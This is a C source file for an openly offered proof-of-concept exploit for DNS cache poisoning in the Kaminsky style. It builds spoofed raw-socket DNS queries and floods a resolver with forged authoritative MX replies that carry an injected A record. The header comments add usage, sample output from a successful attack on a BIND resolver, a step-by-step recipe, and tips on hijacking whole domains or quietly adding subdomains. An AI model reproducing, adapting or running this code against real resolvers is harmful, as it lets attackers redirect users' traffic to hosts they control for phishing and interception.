//
// Die Eier Von Satan       
// a quick'n dirty rewrite of the now old ADMnog00d from Heike (ADM) 
// Exploits a cache poisoning vulnerability found by Dan Kaminsky and present in most DNS resolver implementations around there  
// This POC makes use of a MX RR to spread its poisonous payload, a A RR, but can easily be adapted for other flavors 
//
// Use at your own risk, for legal &: educational purposes 
// and as always to have fun ;)
// Author: Gregory Duchemin (original ADMnog00d from Heike, thanks to him)
//
// version 0.2 changelog
//
// - optimization	:	Questions and fake replies are prepared in advance to optimize cpu usage and hopefully to increase overall throughput. 
//						Obviously actual throughput is still bound by the specifications of your connection.
// - optimization	:	there is no probe retransmission anymore, there is no waiting for a reply.
//						Also, probes are sent once every PROBE_TRIGGER lots of fake replies, in fact it doesn't matter if probes are delayed a bit and/or some replies are lost.
//						Doing so we get a better theoretical throughput, the attack may become more noisy too. (marginally though) 
// - statistics		:   Various statistics are presented in case of a successful attack or at interruption (ctrl-c), to help you tweak your setup
// - code cleanup	:	Still ugly, but well, this is a poc.
//
//
// Usage: Die3ierVonSatan <poisoned ns> <poisoned ns sport> <spoofed ns> <spoofed domain> <spoofed host> <spoofed ip> <question ip> [<reply id min> [<reply id max>]]
//
// Following line try to exploit the cache server at address 192.168.1.10 (a bind 9.4.2) in order to inject "poison.example.lab IN A 6.6.6.6"
// Requests will appear to come from 172.24.16.100, each of them will trigger 101 replies.
// x.x.x.x is one of the authoritative nameservers ip address for example.lab.
//
//		# ./Die3ierVonSatan 192.168.1.10 5012 x.x.x.x example.lab. poison 6.6.6.6 172.24.16.100 31000 31100
//
//		Die3ierVonSatan 0.2 (a quick poc based on ADMnoG00d 0.7 pub)
//		Each request will trigger 101 replie(s) using id space [31000-31100]
//
//		poisoning done.
//
//		---
//		Attack duration: 14s 614ms
//		Questions:
//			Packet size: 46 bytes
//			Total sent: 4690  speed av.: 320.9 q/s  throughput av.: 0.1 Mbit/s
//		 Fake replies:
//			Packet size: 156 bytes
//			 Total sent: 473690  speed av.: 32411.9 r/s  throughput av.: 38.6 Mbit/s
//		Probes:
//			  Packet size: 59 bytes
//			  Total sent: 469  speed av.: 32.1 p/s  throughput av.: 0.0 Mbit/s  replies lost: 82.1%
//
// 
// The newly existing poison.example.lab resolves to 6.6.6.6, you can also override any already existing RR.
// One may also hijack the whole domain or more furtively, create an new sub-domain by adding a glue record pointing to a nameserver he controls.
// 
//  
// Recipe
// 1/ Find the correct src port used by the resolver of the NS undergoing your tests, 
// for this matter you might need access to a registered NS yourself. 
// 2/ Find the authoritative NS for the domain to spoof , the fake replies must appear to come from one of them
// 3/ Choose the A RR to inject along with the IP you want to associate it with,
// 4/ Use this tool with the correct parameters, tune the id interval to fit in your bandwidth/latency situation
// 5/ Wait a little, it will stop automatically when the poisoning is done
// 6/ Und keine eier.
//
//



#include <fcntl.h>
#include <unistd.h>           
#include <stdio.h>
#include <stdlib.h>
#include <memory.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <sys/ioctl.h>
#include <sys/stat.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/time.h>
#include <signal.h>


#define				DNSHDRSIZE 12
#define				IPHDRSIZE     sizeof(struct iphdr)
#define				UDPHDRSIZE    sizeof(struct udphdr)
#define				ERROR	-1
#define				TYPE_A		1
#define				TYPE_CNAME	5
#define				TYPE_NS	2
#define				TYPE_MX		15
#define				VERSION "0.2"
#define				LEN   sizeof(struct sockaddr)
#define				TIMEOUT 300
#define				RETRY 3
#define				TTL 540366
#define				PREFERENCE 666
#define				PROBE_TRIGGER 10;

unsigned long		total_questions = 0, total_replies = 0, total_probes = 0, total_probes_replied = 0;
unsigned short		questionsize = 0, replysize = 0, probesize = 0;
unsigned short int	VERBOSE = 0;
struct timeval		start_ts, end_ts;


struct udphdr 
{
	u_short source;		
	u_short dest;			
	u_short	len;			
	u_short check;		
};


#ifndef IPVERSION
  #define IPVERSION 4
#endif 


struct iphdr 
{
	u_char  ihl:4, version:4;	
	u_char  tos;		
	short   tot_len;	
	u_short id;		
	short   off;		
	#define IP_DF   0x4000
	#define IP_MF   0x2000	
	u_char  ttl;		
	u_char  protocol;	
	u_short check;
	struct  in_addr saddr, daddr; 
};


#ifndef IP_MAXPACKET
	#define IP_MAXPACKET 65535
#endif 


struct dnshdr 
{
	unsigned short int id;
	unsigned char  rd:1;          
	unsigned char  tc:1;          
	unsigned char  aa:1;         
	unsigned char  opcode:4;     
	unsigned char  qr:1;         

	unsigned char  rcode:4;      
	unsigned char  unused:2;     
	unsigned char  pr:1;          
	unsigned char  ra:1;         

	unsigned short int que_num;
	unsigned short int rep_num;
	unsigned short int aut_num;
	unsigned short int add_num;
};



void show_stats()
{
	unsigned long elapsed_u, elapsed;
	float total_elapsed;

	gettimeofday(&end_ts, NULL);

	signal(SIGINT, SIG_DFL);

	elapsed = (end_ts.tv_sec) - (start_ts.tv_sec);
	if ((end_ts.tv_usec) - (start_ts.tv_usec) >= 0)
		elapsed_u = (end_ts.tv_usec) - (start_ts.tv_usec);
	else
		elapsed_u = (end_ts.tv_usec + 1000000) - (start_ts.tv_usec);
	total_elapsed = (float) elapsed + ((float) elapsed_u / 1000000 );

	questionsize += IPHDRSIZE + UDPHDRSIZE + DNSHDRSIZE;
	replysize += IPHDRSIZE + UDPHDRSIZE + DNSHDRSIZE;
	probesize += IPHDRSIZE + UDPHDRSIZE + DNSHDRSIZE;

	printf("\n---\n");
	printf("Attack duration: %lus %lums\n", elapsed, (elapsed_u / 1000));
	printf("Questions:\n");
	printf("   Packet size: %d bytes\n", questionsize);
	printf("   Total sent: %d  speed av.: %.1f q/s  throughput av.: %.1f Mbit/s\n", total_questions, (float) total_questions / total_elapsed, ((float) total_questions / total_elapsed) * (((float) questionsize * 8) / 1048576));
	printf("Fake replies:\n");
	printf("   Packet size: %d bytes\n", replysize);
	printf("   Total sent: %d  speed av.: %.1f r/s  throughput av.: %.1f Mbit/s\n", total_replies, (float) total_replies / total_elapsed, ((float) total_replies / total_elapsed) * (((float) replysize * 8) / 1048576));
	printf("Probes:\n");
	printf("   Packet size: %d bytes\n", probesize);
	printf("   Total sent: %d  speed av.: %.1f p/s  throughput av.: %.1f Mbit/s  replies lost: %.1f%\n", total_probes, (float) total_probes / total_elapsed, ((float) total_probes / total_elapsed) * (((float) probesize * 8) / 1048576), ((float) total_probes_replied / (float) total_probes) * 100);
	printf("\n");

	exit(0);
}


unsigned short myrand()
{
	unsigned short j; 
	j = (unsigned short) (rand() % 1000);
	return(j);
}


unsigned long  host2ip(char *host)
{
  struct sockaddr_in sinn;
  struct hostent *hent;
      
  hent = gethostbyname(host);
  if (hent == NULL) 
	  return 0;

  bzero((char *)&sinn, sizeof(sinn));
  bcopy(hent->h_addr, (char *)&sinn.sin_addr, hent->h_length);
  return sinn.sin_addr.s_addr;
 }



unsigned short in_cksum(u_short *addr, int len)
{
	register int nleft = len;
	register u_short *w = addr;
	register int sum = 0;
	u_short answer = 0;

	while (nleft > 1)  
	{
		sum += *w++;
		nleft -= 2;
	}

	if (nleft == 1) 
	{
		*(u_char *)(&answer) = *(u_char *) w;
		sum += answer;
	}

	sum = (sum >> 16) + (sum & 0xffff);
	sum += (sum >> 16);       
	answer = ~sum;            

	return(answer);
}







void nameformat(char *name, char *QS)
{
	char *ptr_name;
	char *ptr_qs;
	unsigned char count = 0;

	ptr_name = name;
	ptr_qs = QS;

	while (*ptr_name)
	{
		if (*ptr_name == '.')
		{
			sprintf(ptr_qs, "%c", count);
			memcpy(ptr_qs + 1, ptr_name - count, count);
			ptr_qs += count + 1;
			count = 0;
		}
		else
			count ++;

		ptr_name ++;
	}

	sprintf(ptr_qs, "%c", count);
	memcpy(ptr_qs + 1, ptr_name, count);
 }     


unsigned int testpaket(char *data, unsigned long spoofedip, unsigned int len)
{
	unsigned long ip;
	unsigned int ret = 0, i = 0;
	i=0;
	while (i < 200)
	{
		if (spoofedip == (unsigned long) *((unsigned long *)(data + i)))
		{
			ret = 1;
			break;
		}
		i ++;
	}
	return(ret);
 } 


unsigned short makepaketQS(char *data, char *name)
{
	nameformat(name, data);
	*( (u_short *) (data + strlen(data) + 1) ) = htons(TYPE_MX);
	*( (u_short *) (data + strlen(data) + 3) ) = htons(1); 
	return(strlen(data) + 5);   
}


unsigned short makepaketTST(char *data, char *name)
{
	nameformat(name, data);
	*( (u_short *) (data + strlen(data) + 1) ) = htons(TYPE_A);
	*( (u_short *) (data + strlen(data) + 3) ) = htons(1); 
	return(strlen(data) + 5);   
}


unsigned short makepaketAW(char *data, char *fakename, char *spoofedname, char *spoofedip)
{
	unsigned short size;
	char sname[256];
	char fname[256];

	bzero(sname, 256);
	bzero(fname, 256);
	nameformat(fakename, fname);
	nameformat(spoofedname, sname);
	
	// qr
	strcpy(data, fname);
	*( (u_short *) (data + strlen(data) + 1) ) = htons(TYPE_MX); 
	*( (u_short *) (data + strlen(data) + 3) ) = htons(1);        
	size = strlen(data) + 5;
	
	// an
	strcpy(data + size, fname); 
	size += strlen(fname) + 1;    
	*((u_short *) (data + size))       = htons(TYPE_MX);
	*((u_short *) (data + size + 2))   = htons(1);
	*((u_long *) (data + size + 4))    = htonl(TTL);
	*((u_short *) (data + size + 8))   = htons(strlen(sname)+1+2);
	*((u_short *) (data + size + 10))   = htons(PREFERENCE); 
	strcpy(data + size + 12, sname); 
	size += 12 + strlen(sname) + 1;

	// add
	strcpy(data + size, sname); 
	size += strlen(sname) + 1;    
	*((u_short *) (data + size))       = htons(TYPE_A);
	*((u_short *) (data + size + 2))   = htons(1);
	*((u_long *) (data + size + 4))    = htonl(TTL);
	*((u_short *) (data + size + 8))   = htons(4);
	*((u_long *) (data + size + 10))   = host2ip(spoofedip);
	size += 14;

	return(size);
}


     
unsigned short sendquestion_no_rd(int sock, u_long poisonedns, char *spoofedname, unsigned short id)
{
	struct dnshdr *dns;
	char   buffer[1024];
	struct sockaddr_in sin;
	char *data;
	unsigned short  size;

	bzero(buffer, sizeof(buffer));
	dns = (struct dnshdr *) buffer;

	dns->id      = htons(id);
	dns->qr      = 0;
	dns->rd      = 0; 
	dns->aa      = 0;
	dns->que_num = htons(1);
	dns->rep_num = htons(0);
	dns->aut_num = htons(0);
	dns->add_num = htons(0);

 	data = (char *) (buffer + DNSHDRSIZE);
	size = makepaketTST(data, spoofedname);

	sin.sin_family = AF_INET;
	sin.sin_port   = htons(53);
	sin.sin_addr.s_addr = poisonedns;
	while (sendto(sock, buffer, DNSHDRSIZE + size, 0, (struct sockaddr *)&sin, LEN) == -1);

	return(size);
}
    

unsigned short preparequestion(char *packet, u_long questionip, u_long poisonedns, char *fakename)
{
	struct dnshdr		*dns;
	struct   iphdr		*ip;
	struct   udphdr		*udp;
	unsigned char		*data;
	unsigned short		datasize;

	bzero(packet, sizeof(packet));
	
	ip		= (struct iphdr *)	packet; 
	udp		= (struct udphdr *)	(packet + IPHDRSIZE);
	dns		= (struct dnshdr *)	(packet + IPHDRSIZE + UDPHDRSIZE);
	data	= (unsigned char *)	(packet + IPHDRSIZE + UDPHDRSIZE + DNSHDRSIZE);
	
	dns->id      = myrand();
	dns->qr      = 0;
	dns->rd      = 1;
	dns->aa      = 0;
	dns->que_num = htons(1);
	dns->rep_num = htons(0);
	dns->aut_num = htons(0);
	dns->add_num = htons(0);

	datasize = makepaketQS(data, fakename);
		
	udp->source  = htons((unsigned short) (1200 + myrand())); 
	udp->dest    = htons(53);
	udp->len     = htons(UDPHDRSIZE + DNSHDRSIZE + datasize);
	udp->check   = 0;    
	
	//poisonedns = host2ip("192.168.0.100");
	
	ip->saddr.s_addr	= questionip;
	ip->daddr.s_addr	= poisonedns;
	ip->version			= 4;
	ip->ihl				= 5;
	ip->ttl				= 245;
	ip->id				= random() % 5985;
	ip->protocol		= IPPROTO_UDP;
	ip->tot_len			= htons(IPHDRSIZE + UDPHDRSIZE + DNSHDRSIZE + datasize);
	ip->check			= 0;
	ip->check			= in_cksum((u_short *) packet, IPHDRSIZE);   
      
	return(datasize);
} 


void sendquestion(char *packet, u_long questionip, u_long poisonedns, char *fakename)
{
	struct dnshdr		*dns;
	struct   iphdr		*ip;
	struct   udphdr		*udp;
	unsigned char		*data;
	unsigned short		datasize;
	int					sraw;
	struct sockaddr_in	sin;
	int					x;
	int					on = 1;

	if( (sraw = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == ERROR)
	{
		perror("socket");
		exit(ERROR);
	}

	if((setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR)
	{
		perror("setsockopt");
		exit(ERROR);
	}

	ip		= (struct iphdr *)	packet; 
	udp		= (struct udphdr *)	(packet + IPHDRSIZE);
	dns		= (struct dnshdr *)	(packet + IPHDRSIZE + UDPHDRSIZE);
	data	= (unsigned char *)	(packet + IPHDRSIZE + UDPHDRSIZE + DNSHDRSIZE);
	
	dns->id		= myrand();
	datasize	= makepaketQS(data, fakename);
		
	udp->source  = htons((unsigned short) (1200 + myrand())); 
	udp->len     = htons(UDPHDRSIZE + DNSHDRSIZE + datasize);
	
	ip->id       = random() % 5985;
	ip->tot_len  = htons(IPHDRSIZE + UDPHDRSIZE + DNSHDRSIZE + datasize);  
                            
	sin.sin_family = AF_INET;
	sin.sin_addr.s_addr = poisonedns;
	sin.sin_port = htons(53);

	x = sendto(sraw, packet, IPHDRSIZE + UDPHDRSIZE + DNSHDRSIZE + datasize, 0, (struct sockaddr*) &sin, sizeof(struct sockaddr));

	close(sraw);       
}  


unsigned short prepareanswer(char *packet, char *fakename, char *spoofedname, char *spoofedip, u_long questionip, u_long poisonedns, u_long spoofedns, unsigned short poisonednsport)
 {
	struct	 dnshdr		*dns;
	struct   iphdr		*ip;
	struct   udphdr		*udp;
	char				*data;
	unsigned short		datasize;
	unsigned short		sport = 53;

	bzero(packet, sizeof(packet));
	
	ip   = (struct iphdr *) packet; 
	udp  = (struct udphdr *) (packet + IPHDRSIZE);
	dns  = (struct dnshdr *) (packet + IPHDRSIZE + UDPHDRSIZE);
	data = (unsigned char *) (packet + IPHDRSIZE + UDPHDRSIZE + DNSHDRSIZE);
	
	// dns hdr
	dns->id      = htons(0);
	dns->qr      = 1;
	dns->rd      = 0;
	dns->aa      = 1;
	dns->que_num = htons(1);
	dns->rep_num = htons(1);
	dns->aut_num = htons(0);
	dns->add_num = htons(1);
	datasize = makepaketAW(data, fakename, spoofedname, spoofedip);

	// udp hdr
	udp->source  = htons(sport); 
	udp->dest    = htons(poisonednsport);
	udp->len     = htons(UDPHDRSIZE + DNSHDRSIZE + datasize);
	udp->check   = 0;    

	// ip hdr
	ip->saddr.s_addr	= spoofedns;
	ip->daddr.s_addr	= poisonedns;
	ip->version			= 4;
	ip->ihl				= 5;
	ip->ttl				= 245;
	ip->id				= random() % 5985;
	ip->protocol		= IPPROTO_UDP;
	ip->tot_len			= htons(IPHDRSIZE + UDPHDRSIZE + DNSHDRSIZE + datasize);
	ip->check			= in_cksum((u_short *) packet, IPHDRSIZE);   
                                     
	return(datasize);
 } 



void sendanswer(char *packet, unsigned short datasize, u_long poisonedns, unsigned short poisonednsport, unsigned short id)
 {
	struct dnshdr		*dns;
	struct   iphdr		*ip;
	int					on = 1;
	int					sraw;
	int					x;
	struct sockaddr_in  sin;
	
	if( (sraw = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == ERROR)
	{
		perror("socket");
		exit(ERROR);
	}

	if((setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR)
	{
		perror("setsockopt");
		exit(ERROR);
	}

	ip  = (struct iphdr *) packet; 
	dns  = (struct dnshdr *) (packet + IPHDRSIZE + UDPHDRSIZE);
	
	// dns hdr
	dns->id = htons(id);
	
	// ip hdr
	ip->check = in_cksum((u_short *) packet, IPHDRSIZE);   
	
	sin.sin_family = AF_INET;
	sin.sin_addr.s_addr = poisonedns;
	sin.sin_port = htons(poisonednsport);

	x = sendto(sraw, packet, IPHDRSIZE + UDPHDRSIZE + DNSHDRSIZE + datasize, 0, (struct sockaddr*) &sin, sizeof(struct sockaddr));

	close(sraw);
 }  


void usage()
{
	printf(" Die3ierVonSatan <poisoned ns> <poisoned ns sport> <spoofed ns> <spoofed domain> <spoofed host> <spoofed ip> <question ip> [<reply id min> [<reply id max>]]\n"); 
	exit(-1); 
}  


int main(int argc, char **argv)
{
	struct			sockaddr_in sin_rcp;
	struct			dnshdr *dns_recv;
	char            *data;
	char            buffer[4000];
	char            spoofedname[255];
	char            spoofedip[255];
	unsigned long   spoofedns;
	unsigned long   questionip;
	unsigned long	testip;
	unsigned long   poisonedns;    
	unsigned short	poisonednsport;
	char            spoofeddomain[255];
	unsigned char   fakename[255];
	int				sraw, s_r, on=1, ID;
	unsigned short	idmin = 31000;
	unsigned short	idmax = 32000;
	unsigned short  loop;
	int				len = sizeof(struct sockaddr);
	char			*tmp;
	char			ret;
	ssize_t			read;
	unsigned short	reqid = 666;
	char			fakereply[4000];
	char			fakequestion[4000];
	unsigned int	size;
	unsigned int	probe_trigger = 0;
	
	
	srand(time(NULL));

	if( (s_r=socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP)) == ERROR)
	{
		perror("socket");
		exit(ERROR);
	}  
	if( (fcntl(s_r,F_SETFL,O_NONBLOCK)) == ERROR)
	{
		perror("fcntl");
		exit(ERROR);
	}      
	if ((sraw = socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == ERROR)
	{
		perror("socket");
		exit(ERROR);
	}
	if( (setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) == ERROR))
	{
		perror("setsockopt");
		exit(ERROR);
	}
	if(argc < 7 || argc > 10) 
		usage();


	/* poisonned NS */
	poisonedns = host2ip(argv[1]);
	/* poisonned NS src port*/
	poisonednsport = atoi(argv[2]);
	/* spoofed NS */
	spoofedns = host2ip(argv[3]);
	/* spoofed domain */
	strcpy(spoofeddomain, argv[4]);
    /* spoofed host */
	strcpy(spoofedname, argv[5]);
	sprintf(spoofedname,"%s.%s", spoofedname, spoofeddomain);
	/* spoofed ip */
	strcpy(spoofedip, argv[6]);
	tmp = (char *) inet_ntoa(host2ip(spoofedip));
	strcpy(spoofedip, tmp);
	/* test ip */
	testip = host2ip(spoofedip);
	/* question ip */
	questionip = host2ip(argv[7]);
	if (argc >= 9)
		/* id for the first forged reply */
		idmin = (atoi(argv[8]) % 65536);
	if (argc == 10)
	{
		/* and the last one */
		idmax = (atoi(argv[9]) % 65536);
		if (idmax < idmin)
			idmax = idmin;
	}
	else
	{
		if (idmax + 1000 > 65535)
			idmax = 65535;
		else idmax = idmin + 1000;
	}

	printf("\nDie3ierVonSatan %s (a quick poc based on ADMnoG00d 0.7 pub)\n", VERSION); 
	sleep(1);
	printf("Each request will trigger %d replie(s) using id space [%d-%d]\n", idmax - idmin + 1, idmin, idmax);
	if (VERBOSE)
	{
		printf("Probes return codes are as follow\n");
		printf("! success     # timeout     . failure     , mismatch\n");
	}
	if (VERBOSE)
		printf("\nProceeding "); 

	

	questionsize = preparequestion(fakequestion, questionip, poisonedns, "123");

	gettimeofday(&start_ts, NULL);

	signal(SIGINT, show_stats);

	while(1)
	{	
		// 1/ ask for a random MX RR
		sprintf(fakename,"%i%i%i%i%i%i.%s",
		myrand(),
		myrand(),
		myrand(),
		myrand(),
		myrand(),
		myrand(),
		spoofeddomain);

		replysize = prepareanswer(fakereply, fakename, spoofedname, spoofedip, questionip, poisonedns, spoofedns, poisonednsport);
		
		sendquestion(fakequestion, questionip, poisonedns, fakename);

		// 2/ Send several fake MX replies carrying the payload
		for(loop = idmin; loop <= idmax; loop ++)
			sendanswer(fakereply, replysize, poisonedns, poisonednsport, loop); 
		
		total_questions ++;
		total_replies += idmax - idmin + 1;
		
		// 3/ Check the result
		
		probe_trigger = (++ probe_trigger) % PROBE_TRIGGER;

		if (!probe_trigger)
		{
			total_probes ++;
			dns_recv = (struct dnshdr *) (buffer);
			data = (char *) (buffer + DNSHDRSIZE);
			ret = '#';
			probesize = sendquestion_no_rd(s_r, poisonedns, spoofedname, reqid);

			bzero(buffer, sizeof(buffer));
			if(read = recvfrom(s_r, buffer, sizeof(buffer), 0, (struct sockaddr *) &sin_rcp, &len) != -1 )
			{

				if ((sin_rcp.sin_addr.s_addr == poisonedns)
					&& (sin_rcp.sin_port == htons(53))
					&& (dns_recv->id == htons(reqid)) && (dns_recv->qr))
				{
					ret = '.';
					total_probes_replied ++;
					if (dns_recv->rep_num)                        
					{
						if (testpaket(buffer, testip, read))  /* success ! */ 
						{
							if (VERBOSE)
								printf("!\n");
							printf("\npoisoning done.\n");
							show_stats();
						}
						else
							ret = ',';
					}   
				}
			}
		
			if (VERBOSE)
			{
				printf("%c", ret);
				fflush(stdout);
			}
		}
	} 
}

